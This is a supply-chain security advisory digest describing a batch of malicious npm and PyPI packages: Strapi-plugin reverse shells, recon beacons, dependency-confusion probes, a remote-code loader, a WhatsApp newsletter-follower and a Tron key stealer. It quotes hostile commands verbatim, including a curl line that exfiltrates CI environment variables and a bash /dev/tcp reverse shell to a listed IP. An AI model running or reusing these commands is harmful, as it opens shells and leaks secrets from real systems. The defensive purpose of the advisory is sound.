Feed
HighAdvisory sweepPublished 17 Sept 202628 packages · 39 versions

GitHub Advisory malware sweep - 2026-09-16 late + 2026-09-17 (13x `strapi-plugin-*-meeb` port-80 hostname-gated (`ubuntu-fc-uvm`) reverse-shell follow-on to 14.225.210.85:80; `strapi-plugin-osag`/`os-rec` Burp Collaborator OOB recon; `@traktis/environment` + `@traktis/core` dep-confusion pair to `tko.amgsec.com`; `process-mite` npoint.io remote-code loader sibling of `process-lhpm`; `jexkcode` Baileys WhatsApp newsletter-follower; `kartyk-github-*` CWE-506 pentest artefacts; pip `praetorian-mind-rce-test-2026` env exfil + `trongappy` Tron key stealer + `rak-lab-yoav-orca-*` dep-confusion; npm `idx_form_script@999.0.4` 2026-09-17 dep-confusion probe)

Summary

GHSA 2026-09-16 late + 2026-09-17: 13 more strapi-plugin-*-meeb reverse-shell packages targeting 14.225.210.85:80 with ubuntu-fc-uvm hostname gating; -osag/-os-rec Burp Collaborator OOB recon variants from the same operator; @traktis/environment+@traktis/core dep-confusion pair exfiltrating CI env vars to tko.amgsec.com; process-mite reuses the same api.npoint.io loader as yesterdays process-lhpm; jexkcode` is another Baileys newsletter-follower.

typosquatdependency-confusioninfostealercredential-theftci-cd-compromisecrypto-wallet-drainobfuscation
Incident type
Advisory sweep. A dated batch of GitHub Advisory Database malware entries collected together. A sweep mixes kinds - typosquats, dependency-confusion probes, boilerplate takedowns with no published analysis, and occasionally real payloads - and its severity reflects the worst confirmed item, not the batch as a whole.
Detected by
GitHub Advisory Database · OpenSSF malicious-packages · OpenSSF Package Analysis · amazon-inspector
Also known as
2026-09-17 GHSA npm+pip sweep · strapi-plugin-*-meeb port-80 hostname-gated wave (ubuntu-fc-uvm, 14.225.210.85:80) · strapi-plugin-osag/-os-rec Burp Collaborator OOB recon · @traktis dep-confusion pair (tko.amgsec.com env exfil) · process-mite api.npoint.io remote-code loader (process-lhpm sibling) · jexkcode Baileys WhatsApp newsletter-follower · kartyk-github-* pentest OIDC/token artefacts · idx_form_script 999.0.4 dep-confusion probe
Ecosystems
npmPyPI
Packages tracked
28

What happened

Between roughly 2026-09-16 12:00 UTC and 2026-09-17 12:00 UTC, GitHub Advisory Database published 25+ new malware advisories (23 npm, 2 pip advisories that were not caught in yesterdays sweep; 1 npm advisory dated 2026-09-17). Todays batch is dominated by two operator continuities: the -meeb Strapi-plugin RCE operator moved to a hostname-gated :80 variant of yesterdays wave, and the api.npoint.io remote-code-loader operator republished the same payload under a new package name (process-mite vs yesterdays process-lhpm). New patterns: an @traktis dep-confusion pair with CI env-var exfil to a domain (amgsec.com) that reads as a real pentest firm, and a second Baileys-fork WhatsApp newsletter-follower (jexkcode after yesterdays plogme`).

Cluster A - 13x strapi-plugin-*-meeb port-80 hostname-gated reverse-shell follow-on

All 13 packages: v3.6.8, postinstall.js, C2 14.225.210.85:80, hostname gate os.hostname() === "ubuntu-fc-uvm", retry ≤5 attempts.

PackageGHSAShell languageExtra IOC
strapi-plugin-ccrec-meebGHSA-92rg-hf5c-qwp4bash /dev/tcp
strapi-plugin-conresh-meebGHSA-wqj7-9999-2crfbash /dev/tcp/tmp/postinstall-revshell.log
strapi-plugin-perev-meebGHSA-293w-xgv2-3qrjpython3 PTY
strapi-plugin-pysh-meebGHSA-jxxh-j7pf-pvj3python3 PTY
strapi-plugin-ccrev-meebGHSA-3r87-fhjr-5xhfbash /dev/tcp
strapi-plugin-feedmeebGHSA-chmf-v973-774wbash /dev/tcphostname/user capture
strapi-plugin-listcc-meebGHSA-5567-73jx-f7g3python3 PTY
strapi-plugin-maylog-meebGHSA-p65g-47hv-5mfmpython3 PTY/tmp/postinstall-revshell.log
strapi-plugin-portcc-meebGHSA-p247-8vcf-jcm5python3 PTY
strapi-plugin-persh-meebGHSA-x89g-768f-7xrvpython3port 443 fallback + /tmp/postinstall-revshell.log
strapi-plugin-honey-meebGHSA-4373-h9cc-p2hrpython3 PTYlog lines "[+] Starting reverse shell"
strapi-plugin-ccip-meebGHSA-8q85-7c4r-6v2cbash /dev/tcp
strapi-plugin-cccon-meebGHSA-75rj-xxh3-3j2qbash /dev/tcp

Operator continuity. Direct follow-on to multi-2026-09-16-ghsa-malware-sweep Cluster D (14 packages, same operator suffix -meeb/-meeb322k, same C2 14.225.210.85 but port :443, no hostname gate). Yesterday delivered mass reverse-shell coverage; today refines: a lower port (:80, which is more likely to be allowed outbound from restrictive CI networks) plus a hostname gate that keeps casual scanners dormant. The 13 name variants remain plausible Strapi plugin names:

  • ccrec / ccrev / ccip / cccon — plausible Strapi commerce plugin family names
  • feedmeeb — plausible Strapi feed plugin (typo-inclusive fusion of feed + operator suffix)
  • listcc / portcc — plausible list/port CC (credit card?) plugin names
  • honey — plausible honeypot/monitoring plugin
  • maylog / perev / pysh / persh / conresh — plausible logging/auth plugin names

A Strapi developer allowing bare-name resolution can still hit one of these by name-guess.

Cluster B - strapi-plugin-osag + strapi-plugin-os-rec Burp Collaborator OOB recon (same operator)

PackageGHSAPayload
strapi-plugin-osagGHSA-6jhp-v2xp-285pHTTP GET to http://8y70jt07jkewju8wh0o1cgkaw12sqje8.oastify.com/?<hostinfo>
strapi-plugin-os-recGHSA-q676-3wp5-xm49HTTP GET to http://8y70jt07jkewju8wh0o1cgkaw12sqje8.oastify.com/osinfo?<hostinfo>

Both exfiltrate hostname, os.type, os.platform, os.arch, os.release, os.userInfo().username, os.homedir(), and os.networkInterfaces() as query parameters. Same operator naming convention as Cluster A (-meeb-family Strapi-plugin masquerade) but the payload is a passive Burp Collaborator OOB beacon, not a shell. This mirrors the 2026-09-15 Cluster H beacon (os-info-meeb322k, strapi-plugin-os-info-meeb322k — same Burp Collaborator domain family) — the operator continues to run parallel recon and RCE payloads under closely-related names, so that a defender who blocks one class misses the other.

Cluster C - @traktis/environment + @traktis/core dep-confusion pair to tko.amgsec.com

PackageVersionGHSAEndpoint
@traktis/environment99.99.1, 99.99.2GHSA-8w76-frwh-rcpmhttp://tko.amgsec.com/depconf/traktis-environment/
@traktis/core<=99.99.2GHSA-968f-vpg2-j5xrhttp://tko.amgsec.com/depconf/traktis-core/

Both manifest preinstall AND postinstall scripts curl the endpoint with:

curl "http://tko.amgsec.com/depconf/traktis-{environment|core}/?who=$(whoami)&host=$(hostname)&pwd=$(pwd)&t=$(date +%s)&env=$(env | grep -E 'GITHUB__|CI_PROJECT|JENKINS_URL|BUILD_URL|GITLAB__|RUNNER_|HOSTNAME|USER|HOME' | base64)"

Sentinel version 99.99.x is a classic dep-confusion resolution-attack version choice. Scope @traktis reads as an internal enterprise scope. amgsec.com — plausibly AMG Security or similar — the depconf/ URL path is a self-labelled dependency-confusion probe endpoint, so this is most likely a pentest engagement`s probes leaking to public npm. That does NOT reduce the harm: any host that installed the package sent its entire CI environment (including OIDC tokens, cloud IAM keys, build-runner secrets) to a third-party endpoint. Treat those secrets as leaked.

Cluster D - process-mite npm remote-code loader (api.npoint.io sibling of process-lhpm)

process-mite@<=1.1.79 (GHSA-vgjx-m4jg-wrvq) is a direct behavioural sibling of yesterdays process-lhpm (multi-2026-09-16-ghsa-malware-sweep Cluster E). Same trigger (require() auto-invokes initialize()), same detached-child-process pattern, same npoint.io URL (https://api.npoint.io/33e8d008c334b060adad), same eval pattern (base64 decode of a code field). The package.json advertises getRuntimeInfo and calls the module "runtime-utils"; the actual index.js has none of the advertised functionality and inline comments identify the module as a remote-code-execution client. **--ignore-scripts does not block this** — the trigger is require`, not install.

Operator republishes the same loader under a new name within 24h, which lines up with the takedown speed on process-lhpm. Every previously-seen process-* npm package tied to the same npoint.io URL should be on your denylist proactively.

Cluster E - jexkcode npm Baileys WhatsApp newsletter-follower

jexkcode@1.0.1/1.1.0/1.1.1/1.1.2/1.1.3/1.1.4 (GHSA-g9xj-rjfw-h7h6). On any authenticated WhatsApp Web socket, the package auto-invokes newsletterFollow on a hardcoded WhatsApp newsletter JID 3 seconds after connection opens — no user consent, no configuration option to disable. Versions 1.0.1 through 1.1.4 progressively remove console-log messages that would have exposed the behaviour; 1.1.4 is fully silent.

Direct behavioural sibling to yesterdays plogme (multi-2026-09-16-ghsa-malware-sweep Cluster A) — same "malicious Baileys fork forcing newsletter subscription for growth-hack purposes" pattern, but without the crysnovax.link fingerprinting. Not confirmed as the same operator (different C2 fingerprint), but the tactic and target (WhatsApp automation developers) are identical. The two packages together indicate a small cottage industry of Baileys forks whose only "value-add" is forced newsletter growth for the publishers WhatsApp channels.

Cluster F - kartyk-github-* npm CWE-506 pentest OIDC/token artefacts

PackageVersionsGHSA
kartyk-github-single-ver-pkg>=0GHSA-4vpr-3r9p-p9fh
kartyk-github-token-pkg1.0.3, 1.0.4GHSA-4rmp-vchm-9gvg
kartyk-github-oidc-test-pkg1.0.1, 1.0.2, 1.0.4GHSA-4vxh-7998-9h4g

All three carry the CWE-506 "any computer that has this package installed should be considered fully compromised" GHSA boilerplate with no published payload analysis. Names read as red-team engagement test artefacts (prod-oidc-test-pkg, token-pkg, single-ver-pkg) under a kartyk-github- scope prefix — clearly related to yesterdays kartykp-prod-oidc-test-pkg/kartykp-token-pkg (multi-2026-09-16-ghsa-malware-sweep Cluster H, only difference is the trailing "p" on the scope prefix). Same actor, expanding the test-artefact set. Treat as medium` pending analysis.

Cluster G - pip pentest/dep-confusion probes + one Tron crypto stealer

PackageVersionsGHSAPayload
praetorian-mind-rce-test-20260.0.1, 0.0.2, 0.0.3GHSA-8gcf-3vx7-2wrqenv vars + cloud tokens exfil, campaign 2026-09-praetorian-mind-rce-test-2026
rak-lab-yoav-orca-zrktd2cp5hjmo4x79.9.9GHSA-2mp7-443g-cw4cIP + username via setup.py install hook, campaign GENERIC-standard-pypi-install-pentest
trongappy0.0.1GHSA-xr9j-54f9-pcpmTRX private-key stealer, campaign 2025-04-tronix, mimics README of legitimate TRX libraries

praetorian- is Praetorian Security, a real pentest firm — the package is self-labelled as their engagements "rce-test" artefact. The exfil is real: env vars and cloud tokens go to whatever endpoint Praetorians engagement uses. rak-lab-yoav-orca-* is a self-labelled dep-confusion "internal test" (internal test of dependency confusion verbatim in the advisory). trongappy is the odd one out — an actual, non-pentest crypto-wallet-drain package targeting Tron (TRX) blockchain developers.

Cluster H - misc CWE-506 boilerplate takedowns

  • pkg-rollback-dreed-viced-sonic-ponds (GHSA-63f3-rmrf-6m9q) — no payload analysis, no IOC, CWE-506 boilerplate only.
  • bender-rspack-config@<=1.0.0 (GHSA-xq97-9c5h-5m43) — OpenSSF Package Analysis flagged for "executes one or more commands associated with malicious behavior"; no specific IOC.

Both medium pending payload analysis.

Cluster I - 2026-09-17 npm idx_form_script@999.0.4 dep-confusion probe

idx_form_script@999.0.4 (GHSA-82rh-9f4r-4739, OpenSSF campaign MAL-2026-16243). Only 2026-09-17 npm malware advisory today. Version 999.0.4 is a classic dep-confusion resolution-attack sentinel. OpenSSF Package Analysis flagged for "communicates with a domain associated with malicious activity" but no specific C2 host or hash published in the advisory beyond the source hash 59d074c4d6bd941d9586764043d556a83d301711c58eb661d57d63fa06ebec60. Name reads as an internal script (idx_form_script = index-form-script?). Treat as a plausible dep-confusion probe against a real internal name.

Cross-operator patterns worth flagging

  1. The -meeb operator is now on day 3 of a recon-then-RCE cycle (2026-09-15 Burp Collaborator recon → 2026-09-16 port-443 reverse shells → 2026-09-17 port-80 hostname-gated reverse shells + parallel Burp recon variants). Denylist proactively.
  2. The api.npoint.io remote-code operator republishes yesterday`s takedown under a new name. process-lhpm (2026-09-16) → process-mite (2026-09-17), same endpoint. Block api.npoint.io at CI/host egress — the loader survives every takedown by rebranding.
  3. Baileys-fork WhatsApp newsletter-follower cottage industry. plogme (2026-09-16) + jexkcode (2026-09-17) are two separate publishers running the same forced-newsletter-follow tactic; the WhatsApp automation ecosystem has an operator class that is going after Baileys developers specifically.
  4. Pentest artefacts are leaking to public registries at scale. kartyk-github-*/kartykp-* npm plus praetorian-mind-rce-test-2026 and rak-lab-yoav-orca-* pip — four separate engagement leftovers with real exfil payloads inside 48h. Treat these as medium severity (limited real-world targets) but assume a leaked engagement`s captured secrets are effectively public.

Registry state

All packages above are flagged as malware on npm and PyPI and quarantined at the time of writing. Private mirrors that cached the tarballs before quarantine keep serving the malicious versions; network-edge egress blocks on 14.225.210.85, 8y70jt07jkewju8wh0o1cgkaw12sqje8.oastify.com, tko.amgsec.com, and api.npoint.io are the durable mitigation.

Discovery credits

GitHub Advisory Database, OpenSSF malicious-packages, OpenSSF Package Analysis. Per-package IOC details drawn verbatim from GHSA advisory bodies published between 2026-09-16 12:00 UTC and 2026-09-17 12:00 UTC.

Affected packages (28)

These are usually pulled in as transitive dependencies rather than installed directly. Check your whole tree at once - it runs in your browser and nothing is uploaded.

Impact

  • *Cluster A — 13x `strapi-plugin--meeb port-80 hostname-gated (ubuntu-fc-uvm) reverse-shell follow-on to 14.225.210.85:80**: strapi-plugin-ccrec-meeb, -conresh-meeb, -perev-meeb, -pysh-meeb, -ccrev-meeb, -feedmeeb, -listcc-meeb, -maylog-meeb, -portcc-meeb, -persh-meeb, -honey-meeb, -ccip-meeb, -cccon-meeb — all v3.6.8, all postinstall.js payload, split roughly evenly between bash -i >& /dev/tcp/14.225.210.85/80 0>&1 and python3 -c ...pty.spawn("sh") reverse-shell variants. **All 13 gate on os.hostname() === "ubuntu-fc-uvm" before firing** — a distinct evasion tactic that keeps sandbox scanners and generic developer laptops dormant while detonating on the operators intended CI runner naming convention. Direct continuation of yesterdays Cluster D (14 packages, same operator suffix -meeb, but yesterdays were port :443 with no hostname gate). Same C2 (14.225.210.85), one port down, plus a targeting refinement. Some (strapi-plugin-conresh-meeb, -maylog-meeb, -persh-meeb) additionally log to /tmp/postinstall-revshell.log — a marker that survives even a failed connection attempt. strapi-plugin-persh-meeb also references port 443 as a fallback
  • Cluster B — strapi-plugin-osag + strapi-plugin-os-rec npm Burp Collaborator OOB recon variants from the same -meeb operator (no shell, HTTP GET reconnaissance): strapi-plugin-osag@3.6.8 (GHSA-6jhp-v2xp-285p) and strapi-plugin-os-rec@<=3.6.8 (GHSA-q676-3wp5-xm49). Same postinstall trigger and same operator naming convention as Cluster A, but the payload is an HTTP GET to http://8y70jt07jkewju8wh0o1cgkaw12sqje8.oastify.com/osinfo?... (Burp Collaborator OOB subdomain) with query parameters carrying hostname, OS type/platform/arch/release, username, home dir, and full network interface enumeration. No shell — passive reconnaissance to build target maps of the operators hostname-gated Cluster A hits. Confirms the operator continues to run a parallel recon-then-RCE cycle: yesterdays 2026-09-15 Cluster H was Burp Collaborator recon (os-info-meeb322k, strapi-plugin-os-info-meeb322k), 2026-09-16 Cluster D was RCE, and today the operator layers both patterns in the same 24h window
  • Cluster C — @traktis/environment + @traktis/core npm dep-confusion pair with CI env-var exfil to tko.amgsec.com (pre+postinstall): @traktis/environment@99.99.1/99.99.2 (GHSA-8w76-frwh-rcpm) and @traktis/core@<=99.99.2 (GHSA-968f-vpg2-j5xr). Both preinstall AND postinstall lifecycle scripts curl http://tko.amgsec.com/depconf/traktis-environment/ and http://tko.amgsec.com/depconf/traktis-core/ respectively with query parameters carrying whoami, hostname, cwd, timestamp, and a base64-encoded dump of every environment variable matching GITHUB__*, CI_PROJECT, JENKINS_URL, BUILD_URL, GITLAB__*, RUNNER_*, HOSTNAME, USER, HOME. Classic dep-confusion sentinel version pattern (99.99.x) — the scope @traktis reads as an internal enterprise scope name. amgsec.com (AMG Security) is most plausibly a pentest firm domain; the depconf/ path in the URL is a self-labelled dependency-confusion probe. Treat as a real pentest artefact and a functional credential harvester — any host that installed these leaked its full CI environment to the pentest firm`s endpoint, and if that endpoint is later compromised, the leak becomes public
  • Cluster D — process-mite npm remote-code loader reusing yesterdays api.npoint.io endpoint (runs on require`, not install): process-mite@<=1.1.79 (GHSA-vgjx-m4jg-wrvq). On require("process-mite") the auto-invoked initialize() spawns a detached node loader.js process, which HTTPS-fetches https://api.npoint.io/33e8d008c334b060adad, base64-decodes the code field of the returned JSON, and evaluates it with new Function(). Same npoint.io URL as yesterdays process-lhpm` (multi-2026-09-16-ghsa-malware-sweep Cluster E) — same operator, same mutable remote-code hosting bucket, different package name. Falsely advertises itself as a "runtime-utils" library; declared exports (getRuntimeInfo, etc) are absent. --ignore-scripts does NOT block this — the trigger is require, not install-time
  • Cluster E — jexkcode npm Baileys WhatsApp newsletter-follower (unauthorised WhatsApp account modification, progressive log-stripping across versions): jexkcode@1.0.1/1.1.0/1.1.1/1.1.2/1.1.3/1.1.4 (GHSA-g9xj-rjfw-h7h6). On any authenticated WhatsApp Web socket the package auto-invokes newsletterFollow 3 seconds after connection, forcing the user account to follow a hardcoded newsletter JID with no opt-out or configuration. Versions 1.0.1→1.1.4 progressively strip console-log messages that would have exposed the behaviour — 1.1.4 is fully silent. Direct behavioural sibling to yesterdays plogme` (multi-2026-09-16-ghsa-malware-sweep Cluster A) — same Baileys-fork tactic, same forced-newsletter-follow abuse. Not confirmed to be the same operator (no shared C2 domain), but the tactic and target ecosystem (WhatsApp automation devs) are identical
  • *Cluster F — `kartyk-github- npm CWE-506 pentest OIDC/token test artefacts (no published payload analysis)**: kartyk-github-single-ver-pkg@>=0 (GHSA-4vpr-3r9p-p9fh), kartyk-github-token-pkg@1.0.3/1.0.4 (GHSA-4rmp-vchm-9gvg), kartyk-github-oidc-test-pkg@1.0.1/1.0.2/1.0.4 (GHSA-4vxh-7998-9h4g). Closely follow yesterdays kartykp-prod-oidc-test-pkg/kartykp-token-pkg pair (multi-2026-09-16-ghsa-malware-sweep Cluster H) — dropped the trailing "p" from the scope prefix (kartykpkartyk-github), otherwise same naming convention (prod-oidc-test-pkg, token-pkg, single-ver-pkg). Almost certainly a red-team engagement`s serialised test packages that leaked into npm public. GHSA carries only the CWE-506 boilerplate — no IOC published
  • Cluster G — pip pentest/dep-confusion probes with real env exfil (praetorian-mind-rce-test-2026) and a Tron key stealer (trongappy): praetorian-mind-rce-test-2026@0.0.1/0.0.2/0.0.3 (GHSA-8gcf-3vx7-2wrq) — self-labelled Praetorian (real pentest firm) test package that exfiltrates environment variables and cloud tokens; carries the 2026-09-praetorian-mind-rce-test-2026 OpenSSF campaign tag. rak-lab-yoav-orca-zrktd2cp5hjmo4x7@9.9.9 (GHSA-2mp7-443g-cw4c) — self-labelled "internal test of dependency confusion" campaign GENERIC-standard-pypi-install-pentest, exfils IP+username. trongappy@0.0.1 (GHSA-xr9j-54f9-pcpm) — Tron/TRX private-key stealer, 2025-04-tronix campaign, mimics legitimate TRX library READMEs. First two are pentest artefacts, third is a real crypto-wallet drain
  • Cluster H — misc CWE-506 boilerplate takedowns (no published payload): pkg-rollback-dreed-viced-sonic-ponds@>=0 npm (GHSA-63f3-rmrf-6m9q), bender-rspack-config@<=1.0.0 npm (GHSA-xq97-9c5h-5m43, OpenSSF Package Analysis flagged as "executes commands associated with malicious behavior" with no further detail). Treat as medium pending analysis
  • Cluster I — 2026-09-17 npm idx_form_script@999.0.4 dep-confusion probe (OpenSSF Package Analysis): idx_form_script@999.0.4 (GHSA-82rh-9f4r-4739, OpenSSF campaign MAL-2026-16243). Classic dep-confusion sentinel version (999.x.x). OpenSSF Package Analysis flagged for communicating with "a domain associated with malicious activity" but no specific C2 host/IP published in the advisory. Name idx_form_script reads as an internal script name — plausibly a dep-confusion probe against a real internal form-indexing helper

What to do

  1. 1Grep every package-lock.json, yarn.lock, pnpm-lock.yaml, package.json, and Strapi custom-plugin config in your org for every package name in Clusters A through I. Uninstall on hit, wipe node_modules, delete the lockfile, rebuild against a clean cache. Clusters A, B, C, D, E, G include real payloads (reverse shells, Burp beacons, env-var exfil, remote-code loaders, WhatsApp account modification, crypto key theft) — a hit is a compromise, not a warning
  2. 2*For Cluster A `strapi-plugin--meeb (:80 hostname-gated wave)**: any CI runner named ubuntu-fc-uvm that ran npm install for one of the 13 names had an interactive shell on 14.225.210.85:80 during install. Hosts with a different hostname escaped this batch, but the presence of the package in a lockfile still indicates operator interest. Treat any ubuntu-fc-uvm runner as compromised: reimage, rotate every credential accessible from that runner, and rename the runner hostname pattern going forward so the hostname gate no longer matches. Block 14.225.210.85 at egress, and extend your denylist of -meeb/-meeb322k names — the operator escalated from single-port :443 wave (2026-09-16) to :80 + hostname-gate variant (today) within 24h, so treat any future strapi-plugin-*-meeb` name as adversary-controlled
  3. 3For Cluster B strapi-plugin-osag / -os-rec: passive recon only — no shell established — but a hit means your host details (hostname, OS, network interfaces, username) were sent to a Burp Collaborator subdomain the operator controls. Rotate CI credentials as a precaution, uninstall, and add the 8y70jt07jkewju8wh0o1cgkaw12sqje8.oastify.com Burp OOB domain to your egress denylist. Any Strapi CMS developer allowing bare-name plugin resolution should switch to an explicit allowlist
  4. 4For Cluster C @traktis/environment + @traktis/core: any host that installed either package leaked its full CI environment (GitHub OIDC, GitLab tokens, Jenkins BUILD_URL, RUNNER_* secrets) to tko.amgsec.com. Rotate every environment-based secret on the affected host. If you maintain an internal @traktis scope, pin it to your internal registry with .npmrc and configure the registry to refuse public-npm publishes under the same scope. amgsec.com may be a legitimate pentest firm domain — check whether you commissioned the engagement; either way, rotate exposed credentials
  5. 5For Cluster D process-mite: --ignore-scripts does NOT block this — the loader runs on require("process-mite"), not install. Same api.npoint.io/33e8d008c334b060adad endpoint as yesterdays process-lhpm, so blocking api.npoint.io` at egress covers both packages. Kill any detached Node process fetching from that URL, remove the package, rotate every credential the parent Node process could have touched
  6. 6For Cluster E jexkcode: any WhatsApp bot running jexkcode has silently subscribed the user WhatsApp account to a publisher-controlled newsletter. Uninstall the package, unfollow the newsletter manually from the WhatsApp Web session, pin the real @whiskeysockets/baileys package explicitly, and treat any jexkcode-published npm package as adversary infrastructure
  7. 7*For Cluster F `kartyk-github-**: uninstall on hit, rotate env values as a precaution. No host-forensics response required beyond routine credential-rotation prudence. Same posture as yesterdays kartykp-* Cluster H
  8. 8For Cluster G (pip): pip uninstall praetorian-mind-rce-test-2026 rak-lab-yoav-orca-zrktd2cp5hjmo4x7 trongappy and rotate any secrets present in process.env during a pip install that hit one of these. Any host that imported trongappy and had TRX wallet private keys in memory or on disk should treat those keys as stolen. For internal PyPI names, pin your internal registry with --index-url and --extra-index-url order or use a hash-pinned requirements.txt
  9. 9For Clusters H, I (CWE-506 boilerplate + idx_form_script): uninstall on hit, rotate env values as a precaution. Full payload analysis has not been published — treat as medium and re-check the GHSA advisory over the next few days in case Amazon Inspector or a security-vendor blog publishes IOCs
  10. 10For every npm install in CI, prefer --ignore-scripts or an equivalent lockfile-consumer mode that blocks pre/post-install hooks. This blocks Clusters A, B, C, F, G, H entirely, but does NOT block Clusters D (require-time trigger) or E (WhatsApp connection trigger inside legitimate Baileys use)
  11. 11Add every specific package name below to your internal private-registry deny-list for at least 30 days. Extend your existing -meeb/-meeb322k scope pins to block any Strapi plugin name matching those suffixes even without a published GHSA. The -meeb operator is now on day 3 of a recon-then-RCE cycle (2026-09-15 Burp recon → 2026-09-16 port-443 reverse shells → 2026-09-17 port-80 hostname-gated reverse shells + parallel Burp recon variants) — proactive denylisting saves you from tomorrow`s escalation

References

multi-2026-09-17-ghsa-malware-sweep